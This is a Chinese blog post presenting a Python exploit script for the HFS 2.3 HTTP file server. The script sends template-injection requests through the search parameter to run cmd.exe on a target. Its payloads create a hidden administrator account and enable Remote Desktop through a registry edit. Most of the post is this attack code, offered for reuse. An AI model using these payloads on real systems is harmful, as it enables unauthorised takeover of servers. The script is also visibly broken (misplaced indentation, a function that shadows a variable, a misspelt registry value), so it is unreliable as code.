【工具编写】HFS_exp漏洞利用工具

HFS漏洞利用

HFS是什么？

hfs网络文件服务器 2.3是专为个人用户所设计的HTTP档案系统，如果您觉得架设FTP Server太麻烦，那么这个软件可以提供您更方便的网络文件传输系统，下载后无须安装，只要解压缩后执行 hfs.exe，于「Virtual File System(虚拟档案系统)」窗格下按鼠标右键，即可新增/移除虚拟档案资料夹，或者直接将欲加入的档案拖曳至此窗口，便可架设完成个人HTTP网络文件服务器

漏洞exp

"""
1.接受输入的漏洞地址
2.组合漏洞地址并请求
3.判断漏洞是否利用成功
4.将利用成功的进行输出
"""
import requests

url = "http://192.168.1.1"  # 这里换成自己hfs服务器的地址

add_user ="/?search==%00%7B.exec%7Ccmd.exe%20/c%20net%20user%20Adminzhuai%20adminzhuai%20/add%20%26%20net%20localgroup%20administrators%20Adminzhuai%20/add.%7D"
# 创建用户Adminzhuai adminzhuai 并添加到管理员
open3389 ="/?search==%00%7B.exec%7Ccmd.exe%20/c%20REG%20ADD%20HKLM%5CSYSTEM%5CCurrentControlSet%5CControl%5CTerminal%22%20%22Server%20/v%20fDenyTSCconneections%20/t%20REG_DWORD%20/d%2000000000%20/f.%7D"
# 开启3389端口

    url_adduser = url + add_user
    url_open3389 = url + open3389
    
    def adduser():
        code = requests.get(url_adduser).status_code
        if code == 200:
            print("添加用户成功")
        else:
            print("添加用户失败")
    def open3389():
        code2 = requests.get(url_open3389).status_code
        if code2 ==200:
            print("开启3389成功")
        else:
            print("开启3389失败")
    
    adduser()
    open3389()

嫌麻烦的同学也可以使用现成的hfs漏洞利用工具